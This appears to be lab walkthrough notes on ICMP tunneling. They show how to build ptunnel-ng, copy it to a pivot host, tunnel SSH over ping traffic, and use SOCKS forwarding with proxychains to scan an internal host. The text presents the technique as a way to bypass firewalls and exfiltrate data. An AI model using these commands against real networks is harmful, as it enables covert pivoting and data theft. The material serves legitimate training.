ICMP Tunneling with SOCKS

ICMP tunneling encapsulates your traffic within ICMP packets containing echo requests and responses.

When a host within a firewalled network is allowed to ping an external server, it can encapsulate its traffic within the ping echo request and send it to an external server. The external server can validate this traffic and send an appropriate response, which is extremely useful for data exfiltration and creating pivot tunnels to an external server.

We will use the ptunnel-ng tool to create a tunnel between our Ubuntu server and our attack host. Once a tunnel is created, we will be able to proxy our traffic through the ptunnel-ng client. We can start the ptunnel-ng server on the target pivot host.

git clone <https://github.com/utoni/ptunnel-ng.git>
sudo ./autogen.sh

After running autogen.sh, ptunnel-ng can be used from the client and server-side. We will now need to transfer the repo from our attack host to the target host.

#Alternative Approach of building static binary
sudo apt install automake autoconf -y
cd ptunnel-ng/
sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\\/configure" --enable-static $@ \\&\\& make clean \\&\\& make -j${BUILDJOBS:-4} all/' autogen.sh
./autogen.sh

#Transferring Ptunnel-ng to Pivot Host
scp -r ptunnel-ng ubuntu@10.129.202.64:~/

#Starting Server on Pivot Host
sudo ./ptunnel-ng -r10.129.202.64 -R22

The IP address following -r should be the IP we want ptunnel-ng to accept connections on. In this case, whatever IP is reachable from our attack host would be what we would use. We would benefit from using this same thinking & consideration during an actual engagement.

on the attack host, we can attempt to connect to the ptunnel-ng server (-p <ipAddressofTarget>) but ensure this happens through local port 2222 (-l2222). Connecting through local port 2222 allows us to send traffic through the ICMP tunnel.

#Starting Client on Attack Host
sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22

#Tunneling SSH connection through ICMP Tunnel
ssh -p2222 -lubuntu 127.0.0.1

We may also use this tunnel and SSH to perform dynamic port forwarding to allow us to use proxychains in various ways.

# Enable Dynamic Port Forwarding over SSH
ssh -D 9050 -p2222 -lubuntu 127.0.0.1

proxychains nmap -sV -sT 172.16.5.19 -p3389

Questions

sudo scp -r autoconf_2.72-3_all.deb ubuntu@10.129.202.64:~/

sudo scp -r automake1.4_1.4-p6-13.1_all.deb ubuntu@10.129.202.64:~/

sudo scp -r pkg-config_0.29.1-0ubuntu4_amd64.deb ubuntu@10.129.202.64:~/

sudo scp -r m4_1.4.18-4_amd64.deb ubuntu@10.129.202.64:~/

sudo scp -r autotools-dev_20180224.1_all.deb ubuntu@10.129.202.64:~/